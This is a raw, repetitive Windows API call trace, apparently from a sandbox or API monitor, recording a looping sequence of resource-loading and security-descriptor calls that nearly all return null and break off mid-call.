[0219.821] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.821] LockResource (hResData=0x0) returned 0x0 [0219.821] FreeResource (hResData=0x0) returned 0 [0219.821] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.821] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.821] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.821] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.821] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.821] LockResource (hResData=0x0) returned 0x0 [0219.821] FreeResource (hResData=0x0) returned 0 [0219.821] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.821] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.821] LockResource (hResData=0x0) returned 0x0 [0219.821] FreeResource (hResData=0x0) returned 0 [0219.821] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.821] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.821] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.821] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.821] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.821] LockResource (hResData=0x0) returned 0x0 [0219.821] FreeResource (hResData=0x0) returned 0 [0219.821] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.821] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.821] LockResource (hResData=0x0) returned 0x0 [0219.821] FreeResource (hResData=0x0) returned 0 [0219.821] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.821] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.821] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.821] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.821] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.821] LockResource (hResData=0x0) returned 0x0 [0219.822] FreeResource (hResData=0x0) returned 0 [0219.822] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.822] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.822] LockResource (hResData=0x0) returned 0x0 [0219.822] FreeResource (hResData=0x0) returned 0 [0219.822] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.822] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.822] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.822] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.822] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.822] LockResource (hResData=0x0) returned 0x0 [0219.822] FreeResource (hResData=0x0) returned 0 [0219.822] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.822] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.822] LockResource (hResData=0x0) returned 0x0 [0219.822] FreeResource (hResData=0x0) returned 0 [0219.822] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.822] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.822] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.822] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.822] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.822] LockResource (hResData=0x0) returned 0x0 [0219.822] FreeResource (hResData=0x0) returned 0 [0219.822] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.822] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.822] LockResource (hResData=0x0) returned 0x0 [0219.822] FreeResource (hResData=0x0) returned 0 [0219.822] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.822] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.822] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.822] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.822] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.822] LockResource (hResData=0x0) returned 0x0 [0219.822] FreeResource (hResData=0x0) returned 0 [0219.822] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.822] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.822] LockResource (hResData=0x0) returned 0x0 [0219.822] FreeResource (hResData=0x0) returned 0 [0219.822] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.822] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.822] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.822] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.822] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.822] LockResource (hResData=0x0) returned 0x0 [0219.822] FreeResource (hResData=0x0) returned 0 [0219.822] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.823] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.823] LockResource (hResData=0x0) returned 0x0 [0219.823] FreeResource (hResData=0x0) returned 0 [0219.823] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.823] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.823] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.823] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.823] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.823] LockResource (hResData=0x0) returned 0x0 [0219.823] FreeResource (hResData=0x0) returned 0 [0219.823] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.823] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.823] LockResource (hResData=0x0) returned 0x0 [0219.823] FreeResource (hResData=0x0) returned 0 [0219.823] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.823] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.823] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.823] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.823] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.823] LockResource (hResData=0x0) returned 0x0 [0219.823] FreeResource (hResData=0x0) returned 0 [0219.823] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.823] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.823] LockResource (hResData=0x0) returned 0x0 [0219.823] FreeResource (hResData=0x0) returned 0 [0219.823] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.823] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.823] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.823] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.823] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.823] LockResource (hResData=0x0) returned 0x0 [0219.823] FreeResource (hResData=0x0) returned 0 [0219.823] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.823] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.823] LockResource (hResData=0x0) returned 0x0 [0219.823] FreeResource (hResData=0x0) returned 0 [0219.823] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.823] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.823] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.823] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.823] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.824] LockResource (hResData=0x0) returned 0x0 [0219.824] FreeResource (hResData=0x0) returned 0 [0219.824] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.824] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.824] LockResource (hResData=0x0) returned 0x0 [0219.824] FreeResource (hResData=0x0) returned 0 [0219.824] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.824] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.824] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.824] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.824] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.824] LockResource (hResData=0x0) returned 0x0 [0219.824] FreeResource (hResData=0x0) returned 0 [0219.824] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.824] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.824] LockResource (hResData=0x0) returned 0x0 [0219.824] FreeResource (hResData=0x0) returned 0 [0219.824] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.824] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.824] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.824] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.824] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.824] LockResource (hResData=0x0) returned 0x0 [0219.824] FreeResource (hResData=0x0) returned 0 [0219.824] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.824] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.824] LockResource (hResData=0x0) returned 0x0 [0219.824] FreeResource (hResData=0x0) returned 0 [0219.824] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.824] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.824] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.824] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.824] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.824] LockResource (hResData=0x0) returned 0x0 [0219.824] FreeResource (hResData=0x0) returned 0 [0219.824] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.824] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.824] LockResource (hResData=0x0) returned 0x0 [0219.825] FreeResource (hResData=0x0) returned 0 [0219.825] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.825] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.825] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.825] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.825] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.825] LockResource (hResData=0x0) returned 0x0 [0219.825] FreeResource (hResData=0x0) returned 0 [0219.825] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.825] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.825] LockResource (hResData=0x0) returned 0x0 [0219.825] FreeResource (hResData=0x0) returned 0 [0219.825] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.825] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.825] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.825] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.825] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.825] LockResource (hResData=0x0) returned 0x0 [0219.825] FreeResource (hResData=0x0) returned 0 [0219.825] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.825] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.826] LockResource (hResData=0x0) returned 0x0 [0219.826] FreeResource (hResData=0x0) returned 0 [0219.826] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.826] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.826] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.826] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.826] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.826] LockResource (hResData=0x0) returned 0x0 [0219.826] FreeResource (hResData=0x0) returned 0 [0219.826] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.826] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.826] LockResource (hResData=0x0) returned 0x0 [0219.826] FreeResource (hResData=0x0) returned 0 [0219.826] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.826] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.826] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.826] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.826] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.826] LockResource (hResData=0x0) returned 0x0 [0219.826] FreeResource (hResData=0x0) returned 0 [0219.826] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.826] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.826] LockResource (hResData=0x0) returned 0x0 [0219.826] FreeResource (hResData=0x0) returned 0 [0219.826] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.826] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.826] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.826] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.826] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.826] LockResource (hResData=0x0) returned 0x0 [0219.826] FreeResource (hResData=0x0) returned 0 [0219.826] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.826] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.826] LockResource (hResData=0x0) returned 0x0 [0219.826] FreeResource (hResData=0x0) returned 0 [0219.826] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.826] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.826] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.826] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.826] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.826] LockResource (hResData=0x0) returned 0x0 [0219.826] FreeResource (hResData=0x0) returned 0 [0219.826] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.827] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.827] LockResource (hResData=0x0) returned 0x0 [0219.827] FreeResource (hResData=0x0) returned 0 [0219.827] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.827] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.827] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.827] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.827] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.827] LockResource (hResData=0x0) returned 0x0 [0219.827] FreeResource (hResData=0x0) returned 0 [0219.827] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.827] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.827] LockResource (hResData=0x0) returned 0x0 [0219.827] FreeResource (hResData=0x0) returned 0 [0219.827] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.827] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.827] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.827] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.827] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.827] LockResource (hResData=0x0) returned 0x0 [0219.827] FreeResource (hResData=0x0) returned 0 [0219.827] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.827] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.827] LockResource (hResData=0x0) returned 0x0 [0219.827] FreeResource (hResData=0x0) returned 0 [0219.827] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.827] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.827] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.827] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.827] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.827] LockResource (hResData=0x0) returned 0x0 [0219.827] FreeResource (hResData=0x0) returned 0 [0219.827] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.827] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.827] LockResource (hResData=0x0) returned 0x0 [0219.827] FreeResource (hResData=0x0) returned 0 [0219.827] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.827] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.827] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.827] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.827] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.827] LockResource (hResData=0x0) returned 0x0 [0219.827] FreeResource (hResData=0x0) returned 0 [0219.827] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.827] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.827] LockResource (hResData=0x0) returned 0x0 [0219.827] FreeResource (hResData=0x0) returned 0 [0219.827] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.828] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.828] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.828] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.828] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.828] LockResource (hResData=0x0) returned 0x0 [0219.828] FreeResource (hResData=0x0) returned 0 [0219.828] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.828] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.828] LockResource (hResData=0x0) returned 0x0 [0219.828] FreeResource (hResData=0x0) returned 0 [0219.828] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.828] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.828] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.828] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.828] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.828] LockResource (hResData=0x0) returned 0x0 [0219.828] FreeResource (hResData=0x0) returned 0 [0219.828] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.828] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.828] LockResource (hResData=0x0) returned 0x0 [0219.828] FreeResource (hResData=0x0) returned 0 [0219.828] GetPrivateObjectSecurity (in: 